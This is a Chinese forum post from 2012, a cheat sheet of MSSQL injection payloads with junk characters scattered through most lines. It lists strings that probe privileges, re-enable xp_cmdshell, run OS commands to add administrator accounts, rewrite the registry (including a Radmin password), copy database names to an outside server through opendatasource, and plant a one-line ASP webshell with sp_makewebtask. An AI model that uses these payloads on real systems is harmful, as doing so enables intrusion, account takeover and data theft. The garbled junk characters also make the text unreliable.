//看看是什么权限的9 ?; p( v6 @$ p& C, c
and 1=(Select IS_MEMBER('db_owner'))/ {' u: q+ ] X, Y4 L
And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--
( r# \6 U% V+ z+ C; C6 X
1 s; L( m; Y& o1 Q//检测是否有读取某数据库的权限6 H" L. a& [5 F& p- |+ ^
and 1= (Select HAS_DBACCESS('master'))
+ ~/ d' z4 c. u/ KAnd char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --
0 T9 n3 Q' O( K. b9 O( L
4 B5 d% K2 g" C% j0 y9 h1 R/ o" d
! o3 L* Q4 }, v9 k数字类型" ^8 z b8 Z' U/ i4 U5 K
and char(124)%2Buser%2Bchar(124)=0
9 i1 ~2 `+ l' R+ f* U1 t
8 |( g( j$ F+ z字符类型6 g1 K3 J- S# N9 F, B7 f
' and char(124)%2Buser%2Bchar(124)=0 and ''='
) N' }* k$ S$ m/ T6 W9 x. Y' l' F& D' @
搜索类型
* z1 z R& S4 d( F5 f+ r/ F/ F' t7 K+ R' and char(124)%2Buser%2Bchar(124)=0 and '%'='
+ V, A- i- Q5 \; T6 f9 I3 m% m, V I5 E# N1 a3 B1 `6 }" W
爆用户名
# U3 y1 g) {& ]; land user>0- ^ Q3 H$ I: R' x, v
' and user>0 and ''=' J( y3 X. g9 p7 D
. y5 h# z1 w$ _) N5 i检测是否为SA权限
3 L# L: b- h" `1 Y hand 1=(select IS_SRVROLEMEMBER('sysadmin'));--0 @7 w x$ I6 G0 y+ L5 Q
And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --6 L4 v U9 o, j# _9 a% E
2 n0 ?" e* d, i- b
检测是不是MSSQL数据库- h' X9 Z# ]" P8 [6 B
and exists (select * from sysobjects);--
" n4 J) W5 V p. d& e4 E. K6 X6 Z! a& z
检测是否支持多行
; O- D& j4 }7 q( ^;declare @d int;--
: E5 A- l! `* \0 F5 R& e! X3 l O' B4 F7 m8 D3 a8 x# w: f
恢复 xp_cmdshell* E* L9 {# ]. s: K2 |6 o6 h9 H
;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--3 g" `2 i# ~. H
4 B4 g; F" \6 B" B8 @8 ]
* r# M/ L$ Y7 p- K; Oselect * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')7 U$ X4 I" W9 q
$ V, g, C& f+ q! R& j7 @
//-----------------------+ j }/ E+ {! U0 g' w4 C
// 执行命令3 ]! A8 F; d& R( Y- r: f) `
//-----------------------/ [/ q- `3 K2 ~1 u5 z* `4 t
首先开启沙盘模式:
* [) g; }2 C% p; Cexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1" A4 i0 r8 Z7 _ \1 B* V
+ C; K o! I% f4 _. I* j8 l. \6 p然后利用jet.oledb执行系统命令
) _; O0 x' b: D+ Tselect * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
9 E/ q& D9 R8 {2 U2 ?) f+ I: k
! Z' ]3 j' r1 w9 J g, O执行命令: }. _ L [8 [' t+ h+ k- C
;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--
6 u, Y! ?8 r( q6 w7 Y. @5 d W4 e; s8 m
EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'
1 c9 s6 u& v( m. e8 C
3 }: F3 v& R$ k, N$ B ^判断xp_cmdshell扩展存储过程是否存在:
/ Z: H" J" [' ~- f9 o5 Vhttp://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')6 G* ?' d" L0 f( Z8 Z
' u9 ? q; \9 B' k: E写注册表
5 D6 a I0 p. H, D$ qexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
2 d! z" f t0 ]4 A# C" A# z& [2 \# M& L
REG_SZ) w( ~8 p e% P9 U+ C
$ z0 P; M; ~$ E% m读注册表
6 f$ \% T# C/ Gexec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'
# o* N: u8 j) m7 p/ P8 Q! w
4 G0 f5 I! {7 {0 a5 H读取目录内容, L, y$ @3 O- h
exec master..xp_dirtree 'c:\winnt\system32\',1,1/ }/ S5 M* k# w3 W
8 F1 c" C# b. n4 G" H. P: b% J! B3 X: j
数据库备份
- M( d4 o! x( D0 z S3 jbackup database pubs to disk = 'c:\123.bak'
8 C. b( v/ a# n. _0 K) O7 Y& H; h9 D2 e, n8 V0 J+ v4 a$ X
//爆出长度2 I- x1 X7 v2 K! X/ `* `
And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--
4 _/ }0 Z: _1 y
8 m, ?+ C) m, B i) t; Q% q5 D& c# G! v
`4 q; M8 h4 U5 W G ^( D4 g- h5 N
更改sa口令方法:用sql综合利用工具连接后,执行命令: e2 t2 n1 A8 \! \1 X k; C0 s! ]
exec sp_password NULL,'新密码','sa'
2 O* T3 X; S6 ]9 U% B: {2 P9 X) R3 t. N V5 j+ b! x" b6 j1 o
添加和删除一个SA权限的用户test:
8 |) @1 x. p' j5 @. t- m1 Bexec master.dbo.sp_addlogin test,95307723 x7 e* Y$ d0 F* [
exec master.dbo.sp_addsrvrolemember test,sysadmin! r/ a8 G- `# Q/ I9 \2 Q$ E2 v
+ Z$ U v0 M! b4 u删除扩展存储过过程xp_cmdshell的语句:
$ y0 ]3 L0 D9 z9 _3 C0 m+ mexec sp_dropextendedproc 'xp_cmdshell'6 w) r4 D; I6 B& F. g" k
7 Y( q6 Q* b, i7 J
添加扩展存储过过程
, E: m2 b3 F8 A9 P; BEXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'/ ]; H! d0 m6 ?
GRANT exec On xp_proxiedadata TO public
& F7 s6 O; G2 V) a3 u4 d6 }4 q$ E$ e6 s1 e4 a
6 r; Z# \5 a% b1 ]停掉或激活某个服务。
7 u2 ?+ D5 C; v+ m/ ?3 u
) \6 q) ?* d0 H+ {: ?. ]. z J H9 Sexec master..xp_servicecontrol 'stop','schedule'
- X" K+ b! ?5 zexec master..xp_servicecontrol 'start','schedule'
( b1 {* X: S; {+ X3 h& R5 M. Q" c- u) w' q/ @4 q( m. `2 V
dbo.xp_subdirs
8 Z6 i* Y0 l, X3 G$ A) K' b" m% t( K, g0 c
只列某个目录下的子目录。
1 V3 P' e5 I, s# C! xxp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'
( b- M; Q5 C& {6 u' z" w& l; h) L/ ~6 K; ~+ g4 i
dbo.xp_makecab
9 j) t/ u* p" G$ h2 T: a5 P' W1 c# t5 H; f3 d! D) t0 S
将目标多个档案压缩到某个目标档案之内。 \9 A, r/ c2 J k6 x/ s" B, S
所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。
/ W S) E) b2 I1 ?
+ f( P8 \" \' z( K) mdbo.xp_makecab' q7 f4 |/ X7 {8 a5 t% s
'c:\test.cab','mszip',1,
( x9 I" L% O0 b/ @9 D; a& e'C:\Inetpub\wwwroot\SQLInject\login.asp',
0 L" q2 g9 J9 A+ V'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'0 K: v" o; c# a( F1 K
+ {; Q6 L3 {, D$ x; A. D z. z6 i& d! C
xp_terminate_process$ \' O' A3 K; R D
( ?: {( c5 h" x& C# u0 g停掉某个执行中的程序,但赋予的参数是 Process ID。
1 Z5 Z. w- m# } I4 l$ S6 D9 ?. Z- L利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID
+ Z" Z8 ~0 Y9 h
) A. a# u Z- \! G4 c" Xxp_terminate_process 2484
7 q5 R* ~4 E; [5 f2 w" O( E/ n; e- N4 N$ ^ {
xp_unpackcab% H* \% i6 `3 o
+ @+ q$ d0 t/ S! {3 [. m
解开压缩档。- u4 a& j: ~ |, G: O
9 Y: F3 M' A! F0 e6 u0 }
xp_unpackcab 'c:\test.cab','c:\temp',1
+ | V: V: A! V. n% P9 T0 v. f# G. x s% \. g& s/ y
1 J9 j) |5 d5 }* W" ?% L4 [某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234 ?$ _- \2 v5 H4 E3 d: c
A( ?& Q; _% icreate database lcx;
4 ]- s/ V3 }( u& @( {4 y$ ~Create TABLE ku(name nvarchar(256) null);
, d: W! Q% d6 ~3 v: ]3 pCreate TABLE biao(id int NULL,name nvarchar(256) null);5 W# T8 U; N( v2 g0 \ ^7 \$ Q
( a9 M# n3 p, M) G8 b
//得到数据库名# t0 f- W. s$ e- N
insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases/ I+ D/ g; ]( y: a6 A; r* A5 c
+ K* g c" }' ^, l+ m; w" |
3 P& `3 d8 @; r2 \4 N8 e6 X$ ^' z//在Master中创建表,看看权限怎样! {9 p- g8 N* C& Q
Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--
- i X% f9 b. I# ]
- H9 j- p2 _: m8 ]用 sp_makewebtask直接在web目录里写入一句话马:
6 Y' ^9 r7 ]' q7 w1 ghttp://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--
2 _: n8 L2 C: _3 K3 J* O
: E% C) L# f4 N+ r//更新表内容6 O) h) s4 b0 o0 J* l0 L7 p
Update films SET kind = 'Dramatic' Where id = 123+ D5 J' q8 }4 _3 l9 f4 g d4 D$ ]; N
& i) A& |5 R, ?! ]4 r/ n v4 z
//删除内容
$ u2 P6 m) O- j5 g8 Fdelete from table_name where Stockid = 3 |
发表于 2012-9-15 14:40:13
收藏
支持
反对